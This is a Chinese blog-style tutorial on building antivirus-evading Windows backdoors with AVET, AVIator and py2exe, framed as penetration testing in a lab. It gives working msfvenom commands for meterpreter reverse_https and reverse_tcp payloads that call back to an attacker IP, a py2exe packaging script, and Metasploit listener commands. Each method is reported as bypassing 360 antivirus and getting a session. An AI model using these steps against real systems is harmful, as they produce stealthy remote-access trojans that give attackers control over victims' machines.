windows免杀工具三部曲（二）

前言

在渗透测试中经常遇到有杀毒的软件，不会代码层的我只能寻找几款不错的免杀工具。进行傻瓜式配置。这里推荐三款免杀工具（亲测有效）

实验环境

windows 7 (安装360)（IP:10.211.55.4）
kali (IP:10.211.55.10)

AVET工具

安装

参考资料 AVET安装使用
也是傻瓜式安装在kali上，不多说。

使用

参考 github
使用前可以修改一下LHOST、LPORT，来方便生成payload。

vim global_connect_config.sh

编辑该文件，修改为kali的IP和自定义端口

image.png

输入该命令可运行AVET

python3  avet_fabric.py

image.png

任意选择一个脚本，这里我选择的4
然后以下选项全部默认。

image.png

注意msfvenom的命令生成的payload。
会在output文件夹生成output.exe。
测试可过360

AVIator工具

AVIator是后门生成器实用程序，使用加密和注入技术来绕过AV检测。

安装

直接从github上下载就可以
https://github.com/Ch0pin/AVIator

使用

将msfvenom生成的shellcode输入到该工具的payload里。AES KEY和IV默认就可以
点击Encrypt，生成加密后的payload。

msfvenom -p windows/meterpreter/reverse_https  LHOST=10.211.55.10 LPORT=4444  -f csharp

image.png

目标操作系统根据实际情况选择，这里选择x86通用一些。
这里选择注入类型，在内存中创建新类型。
另外也可以自定义图标。
更多参考：
远控免杀专题(14)-AVIator(VT免杀率25/69)
AVIator -- Bypass AV tool

image.png

点击generate exe后就可以生成exe后门程序了。
运行后可成功上线。

image.png

测试可过360。

python打包exe

网上有很多靠python第三方工具来达到免杀效果的文章，也有python加载shellcode之类的文章。有pyinstaller、py2exe。这里说一种打包的方式Py2exe，pyinstaller还正在实验。

参考文章msfvenom免杀木马

在windows7安装32位的python3.4和py2exe
利用msfvenom生成py脚本

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.197.156  lport=443 -f raw -o /tmp/py.py

image.png

创建setup.py

#!/usr/bin/python
# -*- coding: UTF-8 -*-
from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['py.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

替换console文件名，命令打包生成exe

python setup.py py2exe

使用msf

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set exitonsession false
exploit -j -z

image.png

测试可过360。

总结

多几个免杀工具是错不了的。当然会对shellcode编写、加密、变异等方法更香。